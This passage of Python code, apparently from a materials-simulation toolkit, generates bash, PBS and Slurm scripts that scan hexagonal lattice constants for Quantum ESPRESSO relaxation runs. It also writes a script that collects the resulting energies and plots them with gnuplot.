fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" yhrun $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
else:
# a is not optimized
if nc >= 2:
# only optimize c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${c}.in<<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" yhrun $PMF_PWX < relax-${c}.in > relax-${c}.out\n")
fout.write("done\n")
else:
# neither a or c is optimized
pass
# gen pbs script
with open("relax-hexagonal-%d-%d.pbs" % (i_batch_a, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#PBS -N %s-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_c))
fout.write("#PBS -l nodes=%d:ppn=%d\n" % (self.run_params["nodes"], self.run_params["ppn"]))
if "queue" in self.run_params and self.run_params["queue"] != None:
fout.write("#PBS -q %s\n" %self.run_params["queue"])
fout.write("\n")
fout.write("cd $PBS_O_WORKDIR\n")
fout.write("NP=`cat $PBS_NODEFILE | wc -l`\n")
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# - range_a[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# - range_c[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_c_end > range_c[1]:
range_c_end = range_c[1]
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
if nc >= 2:
# optimize both a and c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
# here with the usage of length and scale in bs processing, we can make sure that number like '.123' will be correctly
# set as '0.123', namely the ommited 0 by bs by default is not ommited now!
fout.write(" cp relax.in.template relax-${a}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE $PMF_PWX < relax-${a}-${c}.in > relax-${a}-${c}.out\n")
fout.write("done\n")
else:
# only optimize a
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
else:
# a is not optimized
if nc >= 2:
# only optimize c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${c}.in<<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE $PMF_PWX < relax-${c}.in > relax-${c}.out\n")
fout.write("done\n")
else:
# neither a or c is optimized
pass
# gen local bash script
with open("relax-hexagonal-%d-%d.sh" % (i_batch_a, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# - range_a[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# - range_c[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_c_end > range_c[1]:
range_c_end = range_c[1]
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
if nc >= 2:
# optimize both a and c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
# here with the usage of length and scale in bs processing, we can make sure that number like '.123' will be correctly
# set as '0.123', namely the ommited 0 by bs by default is not ommited now!
fout.write(" cp relax.in.template relax-${a}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${a}-${c}.in | tee relax-${a}-${c}.out\n" % self.run_params["mpi"])
fout.write("done\n")
else:
# only optimize a
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${a}.in | tee relax-${a}.out\n" % self.run_params["mpi"])
fout.write("done\n")
else:
# a is not optimized
if nc >= 2:
# only optimize c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${c}.in<<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${c}.in | tee relax-${c}.out\n" % self.run_params["mpi"])
fout.write("done\n")
else:
# neither a or c is optimized
pass
# gen cdcloud script
with open("relax-hexagonal-%d-%d.slurm_cd" % (i_batch_a, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_c))
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
fout.write("#\n")
fout.write("export I_MPI_PMI_LIBRARY=/opt/gridview/slurm/lib/libpmi.so\n")
#fout.write("mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % (cmd, inpname, output))
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# - range_a[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# - range_c[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_c_end > range_c[1]:
range_c_end = range_c[1]
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
if nc >= 2:
# optimize both a and c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
# here with the usage of length and scale in bs processing, we can make sure that number like '.123' will be correctly
# set as '0.123', namely the ommited 0 by bs by default is not ommited now!
fout.write(" cp relax.in.template relax-${a}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" srun --mpi=pmix_v3 $PMF_PWX < relax-${a}-${c}.in > relax-${a}-${c}.out\n")
fout.write("done\n")
else:
# only optimize a
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" srun --mpi=pmix_v3 $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
else:
# a is not optimized
if nc >= 2:
# only optimize c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${c}.in<<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" srun --mpi=pmix_v3 $PMF_PWX < relax-${c}.in > relax-${c}.out\n")
fout.write("done\n")
else:
# neither a or c is optimized
pass
# generate result analysis script
os.system("mkdir -p post-processing")
with open("post-processing/get_energy.sh", 'w') as fout:
fout.write("#!/bin/bash\n")
# the comment
if na >= 2 and nc >= 2:
fout.write("cat > energy-latconst.data <<EOF\n")
fout.write("# format: a c energy(Ry)\n")
fout.write("EOF\n")
if na >= 2 and nc < 2:
fout.write("cat > energy-latconst.data <<EOF\n")
fout.write("# format: a energy(Ry)\n")
fout.write("EOF\n")
if na < 2 and nc >= 2:
fout.write("cat > energy-latconst.data <<EOF\n")
fout.write("# format: c energy(Ry)\n")
fout.write("EOF\n")
# end
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a[0], range_a[2], a+range_a[1]))
fout.write("do\n")
if nc >= 2:
# both a and c are optimized
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c[0], range_c[2], c+range_c[1]))
fout.write("do\n")
fout.write(" energy=`cat ../relax-${a}-${c}.out | grep '! total energy' | tail -1`\n")
fout.write(" cat >> energy-latconst.data <<EOF\n")
fout.write("${a} ${c} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("doen\n")
fout.write("cat > energy-latconst.gp<<EOF\n")
fout.write("set term gif\n")
fout.write("set output 'energy-latconst.gif'\n")
fout.write("set title 'Energy Latconst'\n")
fout.write("set xlabel 'latconst(a)'\n")
fout.write("set ylabel 'latconst(c)'\n")
fout.write("set zlabel 'Energy'\n")
fout.write("splot 'energy-latconst.data'\n")
fout.write("EOF\n")
else:
fout.write(" energy=`cat ../relax-${a}.out | grep '! total energy' | tail -1`\n")
fout.write(" cat >> energy-latconst.data <<EOF\n")
fout.write("${a} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("cat > energy-latconst.gp<<EOF\n")
fout.write("set term gif\n")
fout.write("set output 'energy-latconst.gif'\n")
fout.write("set title 'Energy Latconst'\n")
fout.write("set xlabel 'latconst(a)'\n")
fout.write("set ylabel 'Energy'\n")
fout.write("plot 'energy-latconst.data' w l\n")
fout.write("EOF\n")
else:
# a is not optimized
if nc >= 2:
# only c is optimized
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c[0], range_c[2], c+range_c[1]))
fout.write("do\n")
fout.write(" energy=`cat ../relax-${c}.out | grep '! total energy' | tail -1`\n")
fout.write(" cat >> energy-latconst.data <<EOF\n")
fout.write("${c} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("cat > energy-latconst.gp<<EOF\n")
fout.write("set term gif\n")
fout.write("set output 'energy-latconst.gif'\n")
fout.write("set title 'Energy Latconst'\n")
fout.write("set xlabel 'latconst(c)'\n")
fout.write("set ylabel 'Energy'\n")
fout.write("plot 'energy-latconst.data' w l\n")
fout.write("EOF\n")
else:
# neither a nor c is optimized
pass
fout.write("gnuplot energy-latconst.gp\n")
#os.system("cd post-processing; bash get_energy.sh; cd ../")
os.chdir("../")
if runopt == "run" or runopt == "genrun":
